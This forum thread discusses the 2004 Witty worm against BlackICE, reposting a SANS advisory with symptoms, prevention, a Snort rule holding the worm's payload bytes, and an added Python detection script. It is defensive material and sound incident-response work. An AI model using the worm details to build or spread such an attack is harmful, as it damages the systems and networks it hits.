
Thread: "Witty" BlackICE Worm (Internet Threat Level: Yellow!)

  1. #1
    Just a Virtualized Geek MrLinus's Avatar
    Join Date
    Sep 2001
    Location
    Redondo Beach, CA
    Posts
    7,323

    Exclamation "Witty" BlackICE Worm (Internet Threat Level: Yellow!)

    I've bolded the immediate fix for this. When I was in Windows I used to use this product. Guess not any more... :(

    Source: Internet Storm Center

    "Witty" worm attacks BlackICE firewall

    Summary
    =======

    At around 12:00 AM EST (05:00 UTC) on Saturday, we detected an upsurge in UDP traffic from source port 4000. This traffic is caused by a new worm ("Witty") which exploits a vulnerability in BlackIce's ICQ parser. Later today, variations of the worm apparently used source ports other than port 4000. However, it is not clear if this is a new variant or a side effect caused by NAT.
    Given that this worm generates large amounts of traffic, and the widespread use of BlackIce, we will keep the InfoCon level at 'YELLOW', likely until Monday morning.

    Detection
    =========

    Infected hosts will send large amounts of UDP traffic, typically saturating a local network connection. The BlackIce task bar icon will no longer allow the user to shut down BlackIce. It will display a message reading "Operation could not be completed. Access is denied".
    Eventually, the system will crash. Infected systems are reported to show corrupted hard disks.
    The worm will not write itself to disk. As a result, virus scanners may not detect it.
    Snort rule:

    alert udp any 4000:5000 -> any any (msg:"Witty Initial Traffic";
    content:"|29202020202020696e73657274207769747479206d6573736167652068657265|"; rev:1;)

    (note: you may want to remove the source port restriction)

    Removal
    =======

    A reboot will remove the worm from the system. However, the worm causes random hard disk corruption and the system may no longer function.

    Prevention
    ==========

    Disconnect systems running BlackIce as soon as possible! Due to recent versions of this worm using various source ports, packet filters are likely ineffective. You would have to block ALL UDP TRAFFIC, which may cause disruption of many valid services.
    However, given that this worm will corrupt hard disks and leave systems unusable, it may be advisable to take this drastic measure until individual systems can be attended to.
    The latest version of BlackIce, released this Wednesday, is the only version which is likely safe. It is identified by the letter 'g' at the end of its version. For example:
    BlackIce 3.6 ccf and BlackIce 3.6 ecf are vulnerable
    BlackIce 3.6 ccg and BlackIce 3.6 ecg are likely safe

    Other ISS products may be vulnerable as well. Please refer to ISS for details (see end of this post for links).

    Links
    =====
    ISS Black Ice downloads: http://blackice.iss.net/update_center/index.php
    Vulnerability Information: http://xforce.iss.net/xforce/alerts/id/166
    F-Secure Writeup: http://www.f-secure.com/v-descs/witty.shtml
    Symantec: http://securityresponse.symantec.com...itty.worm.html

    Sample Packet
    =============

    01:54:45.699383 219.154.156.161.4000 > 65.173.218.164.50212: udp 997

    -----------------------------------------------------------------------
    Johannes Ullrich, jullrich_AT_sans.org SANS Institute.
    Goodbye, Mittens (1992-2008). My pillow will be cold without your purring beside my head
    Extra! Extra! Get your FREE copy of Insight Newsletter||MsMittens' HomePage
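    A small detection script, added here as an example and not part of the ISC advisory or the original post: it applies the same content match as the Snort rule above to constructed UDP packet records, shows what the source-port restriction misses once NAT rewrites the port (the advisory's reason for suggesting it be dropped), and adds a signature-independent heuristic for a host spraying many destinations. The class, function names and sample packets are assumptions for illustration.

```python
from dataclasses import dataclass
from collections import defaultdict

# Payload bytes taken from the ISC Snort rule's content string:
# ") insert witty message here" encoded as hex.
WITTY_CONTENT = bytes.fromhex(
    "29202020202020696e73657274207769747479206d6573736167652068657265"
)

@dataclass
class UdpPacket:  # hypothetical record type for a decoded UDP datagram
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    payload: bytes

def matches_witty(pkt: UdpPacket, restrict_src_port: bool = True) -> bool:
    """Mirror the rule: UDP from source port 4000:5000 (optional) carrying the content."""
    if restrict_src_port and not 4000 <= pkt.src_port <= 5000:
        return False
    return WITTY_CONTENT in pkt.payload

def scan(packets, restrict_src_port=True):
    """Return the packets the signature fires on."""
    return [p for p in packets if matches_witty(p, restrict_src_port)]

def noisy_sources(packets, min_distinct_dsts=3):
    """Signature-independent heuristic: sources sending to many distinct destinations."""
    dsts = defaultdict(set)
    for p in packets:
        dsts[p.src_ip].add((p.dst_ip, p.dst_port))
    return sorted(src for src, d in dsts.items() if len(d) >= min_distinct_dsts)

# Constructed sample traffic (not a real capture); 10.0.0.5 plays an infected host.
SAMPLE = [
    UdpPacket("10.0.0.5", 4000, "192.0.2.10", 50212, b"\x05\x00\x00\x00(^.^" + WITTY_CONTENT),
    UdpPacket("10.0.0.5", 4000, "192.0.2.11", 7, b"(^.^" + WITTY_CONTENT + b". (^.^)"),
    UdpPacket("10.0.0.5", 4000, "192.0.2.12", 9999, WITTY_CONTENT),
    # Same payload, but the source port was rewritten by NAT: missed with the port restriction.
    UdpPacket("10.0.0.9", 61000, "192.0.2.13", 1234, WITTY_CONTENT),
    UdpPacket("10.0.0.6", 4000, "192.0.2.14", 53, b"unrelated traffic from port 4000"),
]

if __name__ == "__main__":
    for p in scan(SAMPLE, restrict_src_port=False):
        print(f"witty content from {p.src_ip}:{p.src_port} -> {p.dst_ip}:{p.dst_port}")
    print("spraying sources:", noisy_sources(SAMPLE))
```

    Run with the restriction on and off to see the NAT-rewritten packet appear only in the second pass; the spray heuristic flags the infected host even without the content match.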

  2. #2
    Senior Member
    Join Date
    Sep 2003
    Posts
    500
    Well thanks the gods that I removed that program a long time ago!
    You shall no longer take things at second or third hand,
    nor look through the eyes of the dead...You shall listen to all
    sides and filter them for your self.
    -Walt Whitman-

  3. #3
    Senior Member nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,188
    Yes, I dumped the "free" version... it did not seem to do well in any of the reviews/tests?

    I also noticed that it only detected "shields up" by "cheating" (hard coded)

    Not very impressive IMHO

    Cheers

  4. #4
    Wow, they're attacking AVs themselves now, heh... at least I never used BlackIce because Norton AV is good enough. Do you think they might start attacking Norton and McAfee too some time in the future?

  5. #5
    Just a Virtualized Geek MrLinus's Avatar
    Join Date
    Sep 2001
    Location
    Redondo Beach, CA
    Posts
    7,323
    Wow, they're attacking AVs themselves now, heh... at least I never used BlackIce because Norton AV is good enough. Do you think they might start attacking Norton and McAfee too some time in the future?
    Umm.. BlackICE Defender is a firewall, not an AV. AVs have always been targeted by viruses (some viruses will try to shut it down). But I think this is the first worm I've seen that targets a firewall specifically.

  6. #6
    Junior Member
    Join Date
    Mar 2004
    Posts
    1
    1st allow me to say Hello, nice to be here, and I think you all have a wonderful site.

    It seems that ISS knew of this vulnerability for some time before it was taken advantage of, and that proper updating of your programs (however unnervingly often with BI) would have kept you safe and buttoned up.

    Here is their full report on it.

  7. #7
    Just a Virtualized Geek MrLinus's Avatar
    Join Date
    Sep 2001
    Location
    Redondo Beach, CA
    Posts
    7,323
    An update from Incidents Storm Center

    Witty Worm Wrap-up

    For our more technical discussion about the Witty worm, see Saturday's diary:
    http://isc.sans.org/diary.html?date=2004-03-20

    We expect to return to infocon 'GREEN' later today.

    Witty Worm Traffic

    Infected machines generated outbound UDP traffic at line speed, frequently saturating local area networks. As a result, the traffic generated was high compared to the number of infected hosts. At this time, we have reports for about 20,000 unique IP addresses sending UDP packets from port 4000 over the weekend. The traffic rose very fast, and dropped within the first hour. This is likely a result of the Witty worm's destructive component, which will crash infected systems and prevent them from rebooting.

    Graphs

    Witty traffic (packets reported): http://isc.sans.org/images/witty1.jpg
    Unique IPs per hour: http://isc.sans.org/images/witty2.jpg

  8. #8
    AntiOnline Senior Member souleman's Avatar
    Join Date
    Oct 2001
    Location
    Flint, MI
    Posts
    2,883
    Not bad, they release the "g" versions on the 19th and the worm is first seen on the 20th. That is just odd.

    The report that Mischief mentioned said that the version from March 9th was safe, but the date of the g version on the website is the 19th, so if a release was done on the 9th, that would be the f version, and the ISC says that that version is vulnerable.

    This is the first one that attacks firewalls directly that I know of, but I believe some have tried to shut down a firewall, just like they shut down the AV. There are also things like old Kerio Personal Firewall Replay attack that could have been written into a worm, but I don't remember ever hearing about that happening.
    "Ignorance is bliss....
    but only for your enemy"
    -- souleman

  9. #9
    Jaded Network Admin nebulus200's Avatar
    Join Date
    Jun 2002
    Posts
    1,356
    Originally posted here by souleman
    Not bad, they release the "g" versions on the 19th and the worm is first seen on the 20th. That is just odd.

    The report that Mischief mentioned said that the version from March 9th was safe, but the date of the g version on the website is the 19th, so if a release was done on the 9th, that would be the f version, and the ISC says that that version is vulnerable.

    This is the first one that attacks firewalls directly that I know of, but I believe some have tried to shut down a firewall, just like they shut down the AV. There are also things like old Kerio Personal Firewall Replay attack that could have been written into a worm, but I don't remember ever hearing about that happening.
    IMHO the attack targeted the ISS RealSecure products that provide intrusion detection. It was a parsing vulnerability in their signatures that the worm used to gain access, and if I had to guess I would say it is the IDS functionality in the BlackIce firewall that was affected, not so much the firewall itself.

    May be way off base here, but given what I have read on the vulnerability, I think it was geared more towards their IDS products...
    There is only one constant, one universal, it is the only real truth: causality. Action. Reaction. Cause and effect...There is no escape from it, we are forever slaves to it. Our only hope, our only peace is to understand it, to understand the 'why'. 'Why' is what separates us from them, you from me. 'Why' is the only real social power, without it you are powerless.

    (Merovingian - Matrix Reloaded)

  10. #10
    Junior Member
    Join Date
    Mar 2004
    Posts
    1
    I use McAfee and ZoneAlarm, never heard of the BlackICE firewall
